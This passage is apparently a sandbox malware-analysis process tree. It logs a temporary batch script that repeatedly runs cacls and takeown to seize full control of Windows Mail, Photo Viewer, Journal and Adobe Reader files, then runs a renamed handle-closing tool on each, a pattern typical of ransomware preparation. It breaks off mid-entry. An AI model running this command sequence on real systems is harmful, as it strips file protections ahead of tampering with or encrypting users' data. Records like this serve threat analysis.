- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Mail\fr-FR\WinMail.exe.mui""
  2⤵
  PID:1128
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\fr-FR\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\fr-FR\WinMail.exe.mui"
    3⤵
    PID:596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:648
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:2036
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""
  2⤵
  PID:684
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:208
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:1968
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1176
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""
  2⤵
  PID:916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"
    3⤵
    PID:968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1044
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1704
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""
  2⤵
  PID:432
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"
    3⤵
    PID:232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:1796
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:1988
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1980
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""
  2⤵
  PID:220
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"
    3⤵
    - Modifies file permissions
    PID:596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:748
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:648
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\de-DE\JNTFiltr.dll.mui""
  2⤵
  PID:1128
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\JNTFiltr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\JNTFiltr.dll.mui"
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    PID:1968
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "JNTFiltr.dll.mui" -nobanner
      4⤵
      PID:208
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1176
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui""
  2⤵
  PID:684
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui"
    3⤵
    PID:968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:1704
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:1044
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui""
  2⤵
  PID:916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui"
    3⤵
    PID:232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "jnwdui.dll.mui" -nobanner
    3⤵
    PID:1988
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "jnwdui.dll.mui" -nobanner
      4⤵
      PID:1796
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1980
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:432
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    PID:596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:648
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:748
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\es-ES\jnwmon.dll.mui""
  2⤵
  PID:1580
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\es-ES\jnwmon.dll.mui" /E /G Admin:F /C
    3⤵
    PID:384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\es-ES\jnwmon.dll.mui"
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "jnwmon.dll.mui" -nobanner
    3⤵
    PID:208
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "jnwmon.dll.mui" -nobanner
      4⤵
      PID:1968
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1176
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui""
  2⤵
  PID:1128
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui"
    3⤵
    - Modifies file permissions
    PID:968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "Journal.exe.mui" -nobanner
    3⤵
    PID:1044
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "Journal.exe.mui" -nobanner
      4⤵
      PID:1704
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""
  2⤵
  PID:1520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1796
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1988
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1980
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""
  2⤵
  PID:236
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C
    3⤵
    PID:964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"
    3⤵
    - Modifies file permissions
    PID:596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "directories.acrodata" -nobanner
    3⤵
    PID:1140
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "directories.acrodata" -nobanner
      4⤵
      PID:2036
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:452
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""
  2⤵
  PID:592
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "license.html" -nobanner
    3⤵
    PID:824
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "license.html" -nobanner
      4⤵
      PID:1968
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\it-IT\MSPVWCTL.DLL.mui""
  2⤵
  PID:2044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\MSPVWCTL.DLL.mui"
    3⤵
    PID:1248
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    PID:1636
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      PID:1704
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\ja-JP\NBMapTIP.dll.mui""
  2⤵
  PID:1600
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\ja-JP\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\ja-JP\NBMapTIP.dll.mui"
    3⤵
    PID:1168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    PID:1804
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      PID:1988
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1680
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\Templates\Graph.jtp""
  2⤵
  PID:1408
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Graph.jtp" /E /G Admin:F /C
    3⤵
    PID:776
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Graph.jtp"
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "Graph.jtp" -nobanner
    3⤵
    PID:648
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "Graph.jtp" -nobanner
      4⤵
      PID:748
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""
  2⤵
  PID:1656
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C
    3⤵
    PID:384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "PurblePlaceMCE.png" -nobanner
    3⤵
    PID:1968
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "PurblePlaceMCE.png" -nobanner
      4⤵
      PID:824
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Mail\de-DE\WinMail.exe.mui""
  2⤵
  PID:592
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\de-DE\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\de-DE\WinMail.exe.mui"
    3⤵
    PID:1248
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:1704
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:1636
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Mail\it-IT\WinMail.exe.mui""
  2⤵
  PID:1580
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\it-IT\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\it-IT\WinMail.exe.mui"
    3⤵
    PID:1168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:1988
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:1804
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1680
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""
  2⤵
  PID:1084
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:776
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:748
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:648
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""
  2⤵
  PID:684
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:824
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:1968
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""
  2⤵
  PID:1108
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"
    3⤵
    PID:1248
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1636
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1704
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    PID:1168
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:1804
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      PID:1988
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1680
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""
  2⤵
  PID:1580
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C
    3⤵
    PID:776
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"
    3⤵
    PID:1808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "pmd.cer" -nobanner
    3⤵
    PID:1524
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "pmd.cer" -nobanner
      4⤵
      PID:2036
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1520
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""
  2⤵
  PID:1404
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C
    3⤵
    PID:208
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"
    3⤵
    PID:1176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "distribute_form.gif" -nobanner
    3⤵
    PID:1588
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "distribute_form.gif" -nobanner
      4⤵
      PID:432
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:824
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""
  2⤵
  PID:1388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C
    3⤵
    PID:1112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "form_responses.gif" -nobanner
    3⤵
    PID:1332
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "form_responses.gif" -nobanner
      4⤵
      PID:220
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""
  2⤵
  PID:1596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"
    3⤵
    - Modifies file permissions
    PID:1640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "reviews_super.gif" -nobanner
    3⤵
    PID:1980
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
